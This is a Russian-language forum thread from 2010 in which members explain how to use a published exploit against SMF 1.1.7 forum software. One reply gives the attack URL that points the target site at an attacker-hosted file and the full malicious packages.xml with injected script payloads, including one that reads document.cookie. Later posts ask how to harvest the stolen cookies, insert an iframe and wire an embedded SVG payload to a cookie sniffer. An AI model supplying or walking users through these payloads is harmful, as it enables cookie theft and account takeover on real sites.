HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Сплойт под SMF 1.1.7
  #1  
Старый 09.01.2010, 09:53
Gos
Новичок
Регистрация: 27.09.2007
Сообщений: 6
С нами: 9801132

Репутация: 0
По умолчанию Сплойт под SMF 1.1.7

Подскажите, как использовать данный эксплойт. Схема действий, хотя бы вкратце..

http://www.exploit-db.com/exploits/7866

Я понимаю, что наверняка много подобных тем, но в поиске почти ничего не нашел... Буду очень благодарен.
 
Ответить с цитированием

  #2  
Старый 09.01.2010, 10:12
Sleep
Участник форума
Регистрация: 31.10.2007
Сообщений: 193
С нами: 9752260

Репутация: 150
По умолчанию

http://атакуемыйсайт.com/index.php?action=packageget;sa=browse;absolute=htt p://твой сайт.com

а на нем файл packages.xml
с таким вот содержанием:
PHP код:
<?xml version="1.0"?>
<!DOCTYPE modification SYSTEM "http://www.simplemachines.org/xml/package-list">
<!-- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
XSRF SMF PoC By Xianur0
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -->

<package-list xmlns="http://www.simplemachines.org/xml/package-list"
xmlns:smf="http://www.simplemachines.org/">
<list-title>Xianur0 Was Here</list-title>

<section>
    <title>SMF XSS PoC By Xianur0</title>
    <text><![CDATA[<script>alert('XSS')</script>]]></text>
    <modification>
        <id>Xianur0:XSMF</id>
        <name>SMF PoC By Xianur0</name>
        <filename>smfexploit.zip</filename>
        <version>0.1</version>
        <author email="uxmal666@gmail.com">Xianur0</author>
        <description><![CDATA[<script>alert(document.cookie)</script>]]></description>
    </modification>
</section>
</package-list>
эммм... как бэ вроде так
 
Ответить с цитированием

  #3  
Старый 09.01.2010, 10:26
Gos
Новичок
Регистрация: 27.09.2007
Сообщений: 6
С нами: 9801132

Репутация: 0
По умолчанию

Цитата:
Сообщение от Sleep  
эммм... как бэ вроде так
это я и сам прочитал) Интересует схема действий, при использовании. Где потом брать куки? куда вставлять айфрейм?
 
Ответить с цитированием

  #4  
Старый 09.01.2010, 10:43
Sleep
Участник форума
Регистрация: 31.10.2007
Сообщений: 193
С нами: 9752260

Репутация: 150
По умолчанию

Цитата:
PHP код:
 <text><!]></text
Цитата:
PHP код:
 <text><!]></text
можно так...
 
Ответить с цитированием

  #5  
Старый 09.01.2010, 10:47
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами: 9846041

Репутация: 1177


По умолчанию

Цитата:
Сообщение от Gos  
это я и сам прочитал) Интересует схема действий, при использовании. Где потом брать куки? куда вставлять айфрейм?

Это уже к сплоиту не имеет отношения. Читай статьи про XSS.
 
Ответить с цитированием

  #6  
Старый 29.01.2010, 16:31
SEKTOR3A
Новичок
Регистрация: 02.05.2009
Сообщений: 18
С нами: 8961488

Репутация: -3
По умолчанию

плиз как использовать данный script ,как сделать ссылку на снифер в данной ситуации,Спасибо.


<EMBED SRC="data:image/svg+xml;base64,как сделать ссылку на снифер" type="image/svg+xml" AllowScriptAccess="always"></EMBED>

Последний раз редактировалось SEKTOR3A; 29.01.2010 в 16:34..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Хостинги под сайты,фото,файлы. Vandam ПО для Web разработчика 2 11.02.2009 15:08



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.